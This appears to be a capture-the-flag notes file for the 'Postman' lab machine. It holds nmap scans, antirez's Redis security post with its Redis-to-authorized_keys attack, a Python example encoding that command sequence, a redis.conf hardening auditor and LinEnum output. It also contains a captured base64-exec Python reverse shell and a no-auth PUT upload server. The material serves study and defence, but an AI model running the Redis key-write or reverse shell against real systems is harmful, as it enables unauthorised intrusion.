
Postman

Process seen on the box (pid 3503, the same line appears in the ps listing further down) and the start of the decoded base64 payload. Both are truncated in the capture: the base64 prefix decodes to "import socket,subp" and the connect address is not visible.

root 3503 0.0 0.9 33400 9120 ? S 06:49 0:00 python -c import base64;exec(base64.b64decode('aW1wb3J0IHNvY2tldCxzdWJwc

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SO
80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"])

nmap (default top-1000 ports, service detection)
Nmap scan report for 10.10.10.160
Host is up (0.54s latency).
Not shown: 997 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA)
|_  256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519)
80/tcp    open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: The Cyber Geek's Personal Website
10000/tcp open  http    MiniServ 1.910 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 101.58 seconds

dirbuster

nmap1 (all 65535 TCP ports; this is the scan that finds Redis, since 6379 is not in nmap's default top-1000 list and the first scan could not see it)
Nmap scan report for 10.10.10.160
Host is up (0.50s latency).
Not shown: 65525 closed ports
PORT      STATE    SERVICE VERSION
22/tcp    open     ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA)
|   256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 (ECDSA)
|_  256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519)
80/tcp    open     http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: The Cyber Geek's Personal Website
6379/tcp  open     redis   Redis key-value store 4.0.9
10000/tcp open     http    MiniServ 1.910 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
13532/tcp filtered unknown
20784/tcp filtered unknown
28883/tcp filtered unknown
29134/tcp filtered unknown
37469/tcp filtered unknown
49977/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2927.64 seconds

redis vuln. (pasted from antirez's post "A few things about Redis security", http://antirez.com/news/96)

From time to time I get security reports about Redis. It's good to get reports, but it's odd that what I get is usually about things like Lua sandbox escaping, insecure temporary file creation, and similar issues, in a software which is designed (as we explain in our security page here http://redis.io/topics/security) to be totally insecure if exposed to the outside world.

Yet these bug reports are often useful since there are different levels of security concerning any software in general and Redis specifically. What can you do if you have access to the database: just modify the content of the database itself, or compromise the local system where Redis is running?

How important a given security layer in a system is depends on its security model. Is the system designed to have untrusted users accessing it, like a web server for example? Are there different levels of authorization for different kinds of users?

The Redis security model is: "it's totally insecure to let untrusted clients access the system, please protect it from the outside world yourself". The reason is that, basically, 99.99% of the Redis use cases are inside a sandboxed environment. Security is complex. Adding security features adds complexity. Complexity for 0.01% of use cases is not great, but it is a matter of design philosophy, so you may disagree of course.

The problem is that, whatever we state in our security page, there are a lot of Redis instances exposed to the internet unintentionally. Not because the use case requires outside clients to access Redis, but because nobody bothered to protect a given Redis instance from outside accesses via firewalling, enabling AUTH, binding it to 127.0.0.1 if only local clients are accessing it, and so forth.

Let's crack Redis for fun and no profit at all given I'm the developer of this thing
===

In order to show the Redis "security model" in a cruel way, I did a quick 5-minute experiment. In our security page we hint at big issues if Redis is exposed. You can read: "However, the ability to control the server configuration using the CONFIG command makes the client able to change the working directory of the program and the name of the dump file. This allows clients to write RDB Redis files at random paths, that is a security issue that may easily lead to the ability to run untrusted code as the same user as Redis is running".

So my experiment was the following: I'll run a Redis instance on my MacBook Air, without touching the computer configuration compared to what I have currently. Now from another host, my goal is to compromise my laptop.

So, to start, let's check if I can access the instance, which is a prerequisite:

$ telnet 192.168.1.11 6379
Trying 192.168.1.11...
Connected to 192.168.1.11.
Escape character is '^]'.
echo "Hey no AUTH required!"
$21
Hey no AUTH required!
quit
+OK
Connection closed by foreign host.

Works, and no AUTH required. Redis is unprotected without a password set up, and so forth. The simplest thing you can do in such a case is to write random files. Guess what? My MacBook Air happens to run an SSH server. What about trying to write something into ~/.ssh/authorized_keys in order to gain access?

Let’s start generating a new SSH key:

$ ssh-keygen -t rsa -C "crack@redis.io"
Generating public/private rsa key pair.
Enter file in which to save the key (/home/antirez/.ssh/
id_rsa): ./id_rsa
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in ./id_rsa.
Your public key has been saved in ./id_rsa.pub.
The key fingerprint is:
f0:a1:52:e9:0d:5f:e4:d9:35:33:73:43:b4:c8:b9:27
crack@redis.io
The key's randomart image is:
+--[ RSA 2048]----+
| . O+.|
| . o o..o*o|
| = . + .+ . |
| oBo . |
| .oS E.|
| . o |
| |
| |
| |
+-----------------+

Now I have a key. My goal is to put it into the Redis server memory, and later to transfer it into a file, in a way that the resulting authorized_keys file is still a valid one. Using the RDB format to do this has the problem that the output will be binary and may in theory also compress strings. But well, maybe this is not a problem. To start, let's pad the public SSH key I generated with newlines before and after the content:

$ (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt

Now foo.txt is just our public key but with newlines. We can write this string inside the memory of Redis using redis-cli:

$ redis-cli -h 192.168.1.11 flushall
$ cat foo.txt | redis-cli -h 192.168.1.11 -x set crackit

Looks good. How to dump our memory content into the authorized_keys file? That's kinda trivial.

$ redis-cli -h 192.168.1.11
192.168.1.11:6379> config set dir /Users/antirez/.ssh/
OK
192.168.1.11:6379> config get dir
1) "dir"
2) "/Users/antirez/.ssh"
192.168.1.11:6379> config set dbfilename "authorized_keys"
OK
192.168.1.11:6379> save
OK

At this point the target authorized_keys file should be full of garbage, but should also include our public key. The string does not have simple patterns so it's unlikely that it was compressed inside the RDB file. Will ssh be so naive as to parse a totally corrupted file without issues, and accept the only sane entry inside?

$ ssh -i id_rsa antirez@192.168.1.11
Enter passphrase for key 'id_rsa':
Last login: Mon Nov 2 15:58:43 2015 from 192.168.1.10
~ ➤ hostname
Salvatores-MacBook-Air.local

Yes. I successfully gained access as the Redis user, with a proper shell, in like five seconds. Courtesy of a Redis instance unprotected being, basically, an on-demand write-this-file server, and in this case, by ssh not being conservative enough to deny access to a file which is all composed of corrupted keys but for one single entry. However ssh is not the problem here: once you can write files, even with binary garbage inside, it's a matter of time and you'll gain access to the system in one way or the other.

How to fix this crap?
===

We say Redis is insecure if exposed, and the security model of Redis is to be accessed only by authorized and trusted clients. But this is unfortunately not enough. Users will still run it unprotected, and even worse, there is a tension between making Redis more secure *against* deployment errors, and making Redis easy to use for people just using it for development or inside secure environments where limits are not needed.

Let's make an example. Newer versions of Redis ship with the example redis.conf defaulting to "bind 127.0.0.1". If you run the server without arguments, it will still bind all interfaces, since I don't want to annoy users who are likely running Redis for development. To have to reconfigure an example server just to allow connections from other hosts is kind of a big price to pay, to win just a little bit of security for people that don't care. However the example redis.conf that many users use as a template for their configuration defaults to binding the localhost interface. Hopefully fewer deployment errors will be made.

However these measures are not very effective, because unfortunately what most security-unaware users will do after realizing that binding 127.0.0.1 is preventing them from connecting clients from the outside is to just drop the bind line and restart. And we are back to the insecure configuration.

Basically the problem is finding a compromise between the following three things:

1. Making Redis accessible without annoyances for people that know what they do.

2. Making Redis less insecure for people that don't know what they do.

3. My bias towards "1" instead of "2" because RTFM.

User ACLs to mitigate the problem
===

One way to add redundancy to the "isolation" concept of Redis from the outside world is to use the AUTH command. It's very simple: you configure Redis to require a password, and clients authenticate via the AUTH command by using the configured password. The mechanism is trivial: passwords are not hashed, and are stated in cleartext inside the configuration file and inside the application, so it's like a shared secret.

While this is not resistant against people sniffing your TCP connections or compromising your application servers, it's an effective layer of security against the obvious mistake of leaving unprotected Redis instances on the internet.

A few notes about AUTH:

1. You can use Redis as an oracle in order to test many passwords per second, but the password does not need to be stored inside a human memory, just inside the Redis config file and client configurations, so pick a very large one, and make it impossible to brute force.

2. AUTH is sent when the connection is created, and most sane applications have persistent connections, so it is a very small cost to pay. It's also an extremely fast command to execute, like GET or SET: disk is not touched, nor any other external system.

3. It's a good layer of protection even for well sandboxed environments. By an error an instance may end up exposed, if not to the internet, at least to clients that should not be able to talk with it.

Maybe evolving AUTH is the right path in order to gain more security, so some time ago I published a proposal to add "real users" in Redis: https://github.com/redis/redis-rcp/blob/master/RCP1.md

This proposal basically adds users with ACLs. It's very similar to AUTH in the way it works and in the speed of execution, but different users have different capabilities. For example normal users are not able to access administrative commands by default, so no "CONFIG SET dir" for them, and no issues like the exploit above.

The default user can still run the normal commands (so the patches people sent me about Lua sandboxing, that I applied, are very useful indeed), and an admin user must be configured in order to use administration commands. However what we could do to make Redis more user friendly is to always have an "admin" user with empty password which is accepted if the connection comes from the loopback interface (but it should be possible to disable this feature).

ACLs, while not perfect, have certain advantages. When Redis is exposed to the internet in the proper way, proxied via SSL, having an additional layer of access control is very useful. Even when no SSL is used since we have just local clients, protecting with more fine grained control what clients can do has several advantages. For instance it can protect against programming or administration errors: FLUSHALL and FLUSHDB could be not allowed to normal users, the client for a Redis monitoring service would use a user only allowing a few selected commands, and so forth.

Users that don't care about protecting their instances will still have a database which is accessible from the outside, but without admin commands available, which still makes things insecure from the point of view of the data contained inside the database, but more secure from the point of view of the system running the Redis instance.

Basically it is impossible to reach the goal of making Redis user friendly by default and resistant against big security mistakes of users spinning an instance bound to a public IP address. However fixing bugs in the API that may allow executing untrusted code with the same privileges of the Redis process, shipping a more conservative default configuration, and implementing multiple users with ACLs, could improve the current state of Redis security without impacting much the experience of normal Redis users that know what they are doing.

Moreover ACLs have the advantage of allowing application developers to create users that match the actual limits of specific clients in the context of the application logic, making mistakes less likely to create big issues.

A drawback of even this simple layer of security is that it adds complexity, especially in the context of replication, Redis Sentinel, and other systems that must all be authentication aware in order to work well in this new context. However it's probably an effort that must be incrementally done.
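Added example, not antirez's code and not from the page: the five commands of the experiment above as the bytes redis-cli puts on the wire (RESP), an imitation of the dump that SAVE writes, and a scanner that treats the result the way sshd does, line by line, keeping only lines that parse as a public key. The function names are mine; fake_rdb() only mimics the shape of an RDB file (magic, aux fields, one string key, EOF marker, checksum) and is not a real dump; demo_key_line() is a constructed ed25519 line with dummy key bytes; nothing here opens a socket.

```python
"""Redis 'write authorized_keys' trick: wire format, dump shape, and why the
garbage-filled file still works. Added example; helper names and the RDB
imitation are assumptions, not Redis project code."""
import base64
import binascii
import re


def resp_encode(*args) -> bytes:
    """One command as a RESP array of bulk strings, exactly as redis-cli sends it."""
    parts = [b"*%d\r\n" % len(args)]
    for a in args:
        b = a if isinstance(a, bytes) else str(a).encode()
        parts.append(b"$%d\r\n%s\r\n" % (len(b), b))
    return b"".join(parts)


def pad_key(pubkey_line: bytes) -> bytes:
    """The foo.txt trick: newlines before and after, so the key sits on a
    line of its own no matter what binary surrounds it in the dump."""
    return b"\n\n\n" + pubkey_line.strip(b"\r\n") + b"\n\n\n\n"


def attack_sequence(pubkey_line: bytes, ssh_dir: str) -> list:
    """FLUSHALL, SET, CONFIG SET dir, CONFIG SET dbfilename, SAVE."""
    return [
        resp_encode("FLUSHALL"),
        resp_encode("SET", "crackit", pad_key(pubkey_line)),
        resp_encode("CONFIG", "SET", "dir", ssh_dir),
        resp_encode("CONFIG", "SET", "dbfilename", "authorized_keys"),
        resp_encode("SAVE"),
    ]


def _rdb_len(n: int) -> bytes:
    """RDB length prefix: 6-bit, 14-bit or 32-bit form."""
    if n < 1 << 6:
        return bytes([n])
    if n < 1 << 14:
        return bytes([0x40 | (n >> 8), n & 0xFF])
    return b"\x80" + n.to_bytes(4, "big")


def fake_rdb(stored_value: bytes) -> bytes:
    """Imitation RDB v8 dump holding one string key (assumed, simplified layout)."""
    aux = b"\xfa" + _rdb_len(9) + b"redis-ver" + _rdb_len(5) + b"4.0.9"
    aux += b"\xfa" + _rdb_len(10) + b"redis-bits" + b"\xc0\x40"   # int-encoded 64
    body = b"\xfe\x00"                                            # SELECTDB 0
    body += b"\x00" + _rdb_len(7) + b"crackit"                    # string type, key name
    body += _rdb_len(len(stored_value)) + stored_value            # value, verbatim
    checksum = b"\x8b\x13\x00\xd9\xa0\x7f\x1e\x02"                # placeholder crc64
    return b"REDIS0008" + aux + body + b"\xff" + checksum


KEY_RE = re.compile(
    rb"^(?P<type>ssh-(?:rsa|ed25519|dss)|ecdsa-sha2-nistp(?:256|384|521)) "
    rb"(?P<b64>[A-Za-z0-9+/]+={0,2})(?: [^\r\n]*)?$"
)


def valid_key_lines(blob: bytes) -> list:
    """sshd-style scan: split on newlines, keep lines that are well-formed keys
    whose base64 blob starts with the algorithm named in the first word.
    Garbage lines are skipped rather than rejected as an error; that is the point."""
    found = []
    for line in blob.split(b"\n"):
        line = line.rstrip(b"\r")
        m = KEY_RE.match(line)
        if not m:
            continue
        try:
            raw = base64.b64decode(m["b64"], validate=True)
        except (binascii.Error, ValueError):
            continue
        if len(raw) < 4:
            continue
        n = int.from_bytes(raw[:4], "big")
        if raw[4:4 + n] != m["type"]:
            continue
        found.append(line)
    return found


def demo_key_line() -> bytes:
    """Constructed ed25519 public key line; the 32 key bytes are a counter, not a key."""
    blob = b"\x00\x00\x00\x0bssh-ed25519" + b"\x00\x00\x00\x20" + bytes(range(32))
    return b"ssh-ed25519 " + base64.b64encode(blob) + b" crack@redis.io"


if __name__ == "__main__":
    key = demo_key_line()
    for cmd in attack_sequence(key, "/Users/antirez/.ssh/"):
        print(cmd)
    dump = fake_rdb(pad_key(key))
    print(len(dump), "bytes of dump,", len(valid_key_lines(dump)), "usable key line(s)")
```

The scanner is deliberately lenient in the same way as sshd's authorized_keys parser: one unparsable line is not a reason to reject the file, which is why binary framing around the key does no harm. The same leniency is what makes the detection side easy: any authorized_keys whose bytes do not all fall into key lines or comment lines was not written by a human.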

Hacker News: http://antirez.com/news/96

Reddit: https://www.reddit.com/r/redis/comments/3rby8c/
a_few_things_about_redis_security/
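Added example, mine rather than the post's or the Redis project's: a check of a redis.conf for the settings the post discusses (bind and requirepass), plus two knobs that arrived in Redis after the post was written and that I consider part of the same fix: protected-mode (Redis 3.2 and later) and rename-command for CONFIG, the mitigation the Redis security page itself suggests. Both sample configurations are constructed here; the 32-character minimum for requirepass is my own threshold, picked because the post says to choose a password that cannot be brute-forced through the server.

```python
"""Audit a redis.conf for the exposure mistakes discussed above.
Added example; finding ids, threshold and sample configs are assumptions."""
from typing import Dict, List

WEAK_CONF = """
# the kind of config that ends up on the internet: listens everywhere,
# no password, protected mode switched off because it "got in the way"
bind 0.0.0.0
protected-mode no
port 6379
dir /var/lib/redis
"""

HARDENED_CONF = """
bind 127.0.0.1 ::1
protected-mode yes
port 6379
requirepass 3f0a9c4e1b7d6f8a2c5e9b1d4f7a0c3e6b9d2f5a8c1e4b7d0f3a6c9e2b5d8f1a
rename-command CONFIG ""
rename-command FLUSHALL ""
dir /var/lib/redis
"""


def parse_redis_conf(text: str) -> Dict[str, List[str]]:
    """Directive -> list of argument strings (a directive may repeat).
    Redis only treats whole lines starting with '#' as comments."""
    conf: Dict[str, List[str]] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        conf.setdefault(parts[0].lower(), []).append(parts[1] if len(parts) > 1 else "")
    return conf


def audit_redis_conf(text: str) -> List[str]:
    """Return finding ids in a fixed order; an empty list means none of the
    checked mistakes is present."""
    conf = parse_redis_conf(text)
    findings: List[str] = []

    binds = [b for args in conf.get("bind", []) for b in args.split()]
    if not binds:
        findings.append("bind-absent")            # no bind line = all interfaces
    elif any(b in ("0.0.0.0", "::", "*") for b in binds):
        findings.append("bind-all")

    passwords = [p.strip().strip('"') for p in conf.get("requirepass", [])]
    if not passwords or not passwords[-1]:        # last occurrence wins in Redis
        findings.append("no-requirepass")
    elif len(passwords[-1]) < 32:
        findings.append("short-requirepass")      # assumed threshold

    # protected-mode only refuses outside clients when there is no bind line
    # and no password, so it does not rescue 'bind 0.0.0.0'; still flag it off.
    if any(v.strip().lower() == "no" for v in conf.get("protected-mode", [])):
        findings.append("protected-mode-off")

    renamed = {args.split()[0].upper() for args in conf.get("rename-command", []) if args.split()}
    if "CONFIG" not in renamed:
        findings.append("config-not-renamed")     # CONFIG SET dir/dbfilename stays reachable

    return findings


if __name__ == "__main__":
    print("weak:    ", audit_redis_conf(WEAK_CONF))
    print("hardened:", audit_redis_conf(HARDENED_CONF))
```

Renaming CONFIG to the empty string removes the command entirely, which closes the dir/dbfilename/SAVE path from the post even for a client that has the password; the cost is that administrative tooling has to use the renamed command instead.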

redis (ls -la of the redis user's home directory, /var/lib/redis)
total 660
drwxr-x---  7 redis redis   4096 Nov 16 06:36 .
drwxr-xr-x 37 root  root    4096 Aug 25 21:24 ..
drwxr-xr-x  2 root  root    4096 Oct 25 15:21 6379
-rw-------  1 redis redis    399 Oct 25 14:43 .bash_history
drwx------  2 redis redis   4096 Aug 25 23:46 .cache
-rw-r-----  1 redis redis  46760 Aug 26 01:40 dkixshbr.so
-rw-rw----  1 redis redis     92 Nov 16 06:36 dump.rdb
drwx------  3 redis redis   4096 Aug 25 23:46 .gnupg
-rw-r-----  1 redis redis  46760 Aug 25 22:26 ibortfgq.so
drwxrwxr-x  3 redis redis   4096 Aug 26 02:31 .local
-rw-r-----  1 redis redis 440656 Aug 25 22:54 module.o
-rw-r-----  1 redis redis  46760 Aug 25 22:21 qcbxxlig.so
drwxr-xr-x  2 redis root    4096 Nov 16 06:48 .ssh
-rw-r-----  1 redis redis  46760 Aug 25 22:22 vlpaulhk.so

The .ssh directory here is owned and writable by the redis user, the redis account has /bin/bash as its login shell (see /etc/passwd below) and sshd is up, so the dir/dbfilename/SAVE sequence from the post applies to this box exactly as written. Note also the four identically sized .so files and module.o left in the home directory.

dump.rdb (readable strings in the 92-byte file: RDB format version 8, written by Redis 4.0.9, aux fields only)
REDIS0008 redis-ver4.0.9
redis-bits@ctimeused-mem8
aof-preamble+p>

contents of 6379 (the root-owned directory)
dump.rdb (readable strings: RDB format version 9, written by Redis 5.0.0)
REDIS0009 redis-ver5.0.0
redis-bits@ctimeused-memx
aof-preamble W__

content of /var/www
SimpleHTTPPutServer.py

# python -m SimpleHTTPPutServer 8080
# Python 2. A stock SimpleHTTPServer with a PUT handler bolted on: the request
# body is written to whatever file the URL path maps to under the current
# directory, with no authentication and no check beyond translate_path().
import SimpleHTTPServer
import BaseHTTPServer


class SputHTTPRequestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
    def do_PUT(self):
        print self.headers
        length = int(self.headers["Content-Length"])
        path = self.translate_path(self.path)   # URL path -> file under cwd
        with open(path, "wb") as dst:
            dst.write(self.rfile.read(length))
        self.send_response(201)                 # added: acknowledge the write so the client does not hang
        self.end_headers()


if __name__ == '__main__':
    SimpleHTTPServer.test(HandlerClass=SputHTTPRequestHandler)

LinEnum

#########################################################
# Local Linux Enumeration & Privilege Escalation Script #
#########################################################
# www.rebootuser.com
# version 0.98

[-] Debug Info
[+] Thorough tests = Disabled

Scan started at:
Wed Nov 20 06:51:20 GMT 2019
### SYSTEM
#######################################
[-] Kernel information:
Linux Postman 4.15.0-58-generic #64-Ubuntu SMP Tue Aug 6 11:12:41 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux

[-] Kernel information (continued):
Linux version 4.15.0-58-generic (buildd@lcy01-amd64-013) (gcc version 7.4.0 (Ubuntu 7.4.0-1ubuntu1~18.04.1)) #64-Ubuntu SMP Tue Aug 6 11:12:41 UTC 2019

[-] Specific release information:
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=18.04
DISTRIB_CODENAME=bionic
DISTRIB_DESCRIPTION="Ubuntu 18.04.3 LTS"
NAME="Ubuntu"
VERSION="18.04.3 LTS (Bionic Beaver)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 18.04.3 LTS"
VERSION_ID="18.04"
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=bionic
UBUNTU_CODENAME=bionic

[-] Hostname:
Postman

### USER/GROUP
#######################################
[-] Current user/group info:
uid=107(redis) gid=114(redis) groups=114(redis)

[-] Users that have previously logged onto the system:
Username         Port     From             Latest
root             pts/0    10.10.14.3       Tue Oct 29 09:26:37 +0000 2019
Matt             pts/4    192.168.1.4      Mon Aug 26 00:04:37 +0100 2019
redis            pts/0    10.10.16.8       Wed Nov 20 06:48:31 +0000 2019

[-] Who else is logged on:
 06:51:20 up 17 min,  1 user,  load average: 0.09, 0.21, 0.18
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
redis    pts/0    10.10.16.8       06:48    8.00s  0.01s  0.00s /bin/bash ./LinEnum.sh

[-] Group memberships:
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=100(systemd-network) gid=102(systemd-network) groups=102(systemd-network)
uid=101(systemd-resolve) gid=103(systemd-resolve) groups=103(systemd-resolve)
uid=102(syslog) gid=106(syslog) groups=106(syslog),4(adm)
uid=103(messagebus) gid=107(messagebus) groups=107(messagebus)
uid=104(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=105(uuidd) gid=109(uuidd) groups=109(uuidd)
uid=106(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=1000(Matt) gid=1000(Matt) groups=1000(Matt)
uid=107(redis) gid=114(redis) groups=114(redis)

[-] It looks like we have some admin users:
uid=102(syslog) gid=106(syslog) groups=106(syslog),4(adm)

[-] Contents of /etc/passwd:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:105:109::/run/uuidd:/usr/sbin/nologin
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
Matt:x:1000:1000:,,,:/home/Matt:/bin/bash
redis:x:107:114::/var/lib/redis:/bin/bash

[-] Super user account(s):
root

[-] Are permissions on /home directories lax:
total 12K
drwxr-xr-x  3 root root 4.0K Sep 11 11:27 .
drwxr-xr-x 22 root root 4.0K Aug 25 15:03 ..
drwxr-xr-x  6 Matt Matt 4.0K Sep 11 11:28 Matt

[-] Root is allowed to login via SSH:
PermitRootLogin yes

Two things in this section matter later: the redis service account has /bin/bash as its shell (every other service account here has nologin), and root may log in over SSH, so a root credential or key obtained anywhere on the box is directly usable from outside.


### ENVIRONMENTAL
#######################################
[-] Environment information:
SSH_CONNECTION=10.10.16.8 44362 10.10.10.160 22
LANG=en_US.UTF-8
XDG_SESSION_ID=4
USER=redis
PWD=/var/lib/redis
HOME=/var/lib/redis
SSH_CLIENT=10.10.16.8 44362 22
SSH_TTY=/dev/pts/0
MAIL=/var/mail/redis
SHELL=/bin/bash
TERM=xterm-256color
SHLVL=2
LOGNAME=redis
XDG_RUNTIME_DIR=/run/user/107
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games
_=/usr/bin/env

[-] Path information:
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games

[-] Available shells:
# /etc/shells: valid login shells
/bin/sh
/bin/bash
/bin/rbash
/bin/dash

[-] Current umask value:
0002
u=rwx,g=rwx,o=rx

[-] umask value as specified in /etc/login.defs:
UMASK 022

[-] Password and storage information:
PASS_MAX_DAYS 99999
PASS_MIN_DAYS 0
PASS_WARN_AGE 7
ENCRYPT_METHOD SHA512

### JOBS/TASKS
#######################################
[-] Cron jobs:
-rw-r--r-- 1 root root 722 Nov 16  2017 /etc/crontab

/etc/cron.d:
total 20
drwxr-xr-x  2 root root 4096 Aug 25 18:44 .
drwxr-xr-x 81 root root 4096 Oct 25 16:44 ..
-rw-r--r--  1 root root  712 Jan 17  2018 php
-rw-r--r--  1 root root  102 Nov 16  2017 .placeholder
-rw-r--r--  1 root root  191 Aug 24 11:33 popularity-contest

/etc/cron.daily:
total 56
drwxr-xr-x  2 root root 4096 Aug 25 18:24 .
drwxr-xr-x 81 root root 4096 Oct 25 16:44 ..
-rwxr-xr-x  1 root root  539 Jul 16 19:14 apache2
-rwxr-xr-x  1 root root 1478 Apr 20  2018 apt-compat
-rwxr-xr-x  1 root root   77 Sep  5  2008 apt-show-versions
-rwxr-xr-x  1 root root  355 Dec 29  2017 bsdmainutils
-rwxr-xr-x  1 root root 1176 Nov  2  2017 dpkg
-rwxr-xr-x  1 root root  372 Aug 21  2017 logrotate
-rwxr-xr-x  1 root root 1065 Apr  7  2018 man-db
-rwxr-xr-x  1 root root  538 Mar  1  2018 mlocate
-rwxr-xr-x  1 root root  249 Jan 25  2018 passwd
-rw-r--r--  1 root root  102 Nov 16  2017 .placeholder
-rwxr-xr-x  1 root root 3477 Feb 21  2018 popularity-contest
-rwxr-xr-x  1 root root  246 Mar 21  2018 ubuntu-advantage-tools

/etc/cron.hourly:
total 12
drwxr-xr-x  2 root root 4096 Aug 24 11:27 .
drwxr-xr-x 81 root root 4096 Oct 25 16:44 ..
-rw-r--r--  1 root root  102 Nov 16  2017 .placeholder

/etc/cron.monthly:
total 12
drwxr-xr-x  2 root root 4096 Aug 24 11:27 .
drwxr-xr-x 81 root root 4096 Oct 25 16:44 ..
-rw-r--r--  1 root root  102 Nov 16  2017 .placeholder

/etc/cron.weekly:
total 16
drwxr-xr-x  2 root root 4096 Aug 24 11:33 .
drwxr-xr-x 81 root root 4096 Oct 25 16:44 ..
-rwxr-xr-x  1 root root  723 Apr  7  2018 man-db
-rw-r--r--  1 root root  102 Nov 16  2017 .placeholder

[-] Crontab contents:
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#

[-] Systemd timers:
NEXT                         LEFT          LAST                         PASSED        UNIT                          ACTIVATES
Wed 2019-11-20 07:09:00 GMT  17min left    Wed 2019-11-20 06:39:00 GMT  12min ago     phpsessionclean.timer         phpsessionclean.service
Wed 2019-11-20 14:57:12 GMT  8h left       Wed 2019-11-20 06:33:43 GMT  17min ago     motd-news.timer               motd-news.service
